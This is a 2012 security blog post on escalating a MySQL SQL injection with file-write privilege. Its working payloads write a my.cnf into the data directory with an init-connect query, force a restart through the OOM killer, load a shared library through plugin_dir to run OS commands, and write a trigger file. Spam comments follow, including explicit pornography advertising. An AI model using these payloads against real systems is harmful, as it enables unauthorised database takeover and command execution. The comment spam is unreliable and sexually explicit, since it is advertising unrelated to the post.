воскресенье, 4 марта 2012 г.

Advanced SQLi exploitation with FILE_PRIV

We would like to open our blog notes on the practical implementation of the SQL-injections. 
And also we try to focus more attention on the practical aspects of web application security in the future.

SQL injections are the most common server-side Web application vulnerabilities and meet almost every audit in our practice.
Very often it happens that through these vulnerabilities we can write files (granted FILE_PRIV).
The simplest way of the exploitation in this case - write executable script (i.e. shell.php) in www-root (i.e. /var/www/).
But sometimes there is no filesystem rights to write in /var/www.


We would like to present a method for the operation of these vulnerabilities to execute arbitrary queries and even commands (tested in Debian lenny).
This is not the easiest attack vector, but it is possible!


The idea is very simple and is to replace the file my.cnf. This configuration file is write-protected directory:
-rw-r--r-- 1 root root 3596 /etc/mysql/my.cnf
#debian lenny
However, if you write my.cnf in DATADIR it will work! And DATADIR is writable always:
drwx------  4 mysql   mysql   4096 /var/lib/mysql
#debian lenny


Then look at documentation:


Finally, attack vector will be like that:
'AND 1=2 UNION SELECT '[mysqld]\ninit-connect="update users set passwd=123 where id=0"\n#
INTO OUTFILE '/var/lib/mysql/my.cnf'-- -


Now you can execute any query from SQL-injection into SELECT statement and FILE_PRIV.
Query in init-connect will be executed after the non-SUPER user logs in. 
And there is another problem - you must somehow restart MySQL daemon.
The easiest way to wait until it happens naturally.
But you can always send a hard query to exceed a memory limit. 
Then OOM Killer make your job ;)


On MySQL 5.1.2+ (required by http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_plugin_dir) you can also execute OS commands by my.cnf like that:
[mysqld]
plugin_dir = /var/tmp/aaa # 5.1.2+ only
init-connect = "CREATE FUNCTION do_system RETURNS INTEGER SONAME 'so_system.so.0.0';"
# 2 3 4 5 6 7 8 9 10 11
Where /var/tmp/aaa is any writable directory, so_system.so.0.0 is your binary library.

UPDATE: see also genius work from: http://www.wisec.it/sectou.php?p=1
AND 1=0 union select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/users/user.TRG' LINES TERMINATED BY '\\ntriggers=\'CREATEDEFINER=`root`@`localhost` trigger atk after insert on user for each row\\nbegin\\nupdate user set isadmin=0 whereisadmin=1;\\nend\'sql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';

Thank you for your attention.
//Alexander Golovko, Vladimir d0znpp Vorontsov 

7 комментариев:


  1. How do you clean a fabric sofa?

    How much does it cost to have a sofa cleaned?

    How do you clean a sofa?

    Can you get a couch professionally cleaned?

    شركة تنظيف كنب بمكة بالبخار




    ОтветитьУдалить
  2. Beside guiding, you will likewise find out about the abilities you have to adapt in the rest of the world, where enticement will consistently be hiding. You will likewise be determined to a wellbeing program which encourages you to get fit and appreciate exercise and sustenance with the goal that you kick your propensity as well as become a more beneficial person generally speaking. Liquor rehab can be perhaps the best thing that transpires. In the event that you are prepared to find support and quit drinking, set up an arrangement to meet with a rehab focus and get your life back. Try not to be embarrassed. You can do it and will have the option to roll out the improvements you have to improve personally.
    alcohol rehab center florida
    inpatient alcohol rehab florida

    ОтветитьУдалить
  3. There are 281 films right here proper now taken from 76 complete-duration DVDs, and you're able to watch them as standalone scenes or as scenes so as from a DVD, as there are sections for both scenes and complete DVDs, so it's clean. New movies are introduced five times consistent with month, and they take a selected topic. It's all realty fashion filming and steps, with excellent performing from the guys and girls to set the scenes, and that's commonly about a wife being bored, or looking to play away, or making her husband watch as she bangs another guy. There also are a few gangbang films, recently there's been a few sizzling interracial movement, and there are a few threesomes. All the time, the babes are lovely, the boners are big, and the balls unload cum in pussies, creampies, mouths and on mature, company boobs at yespornplease
    yespornplease
    yespornplease.com

    ОтветитьУдалить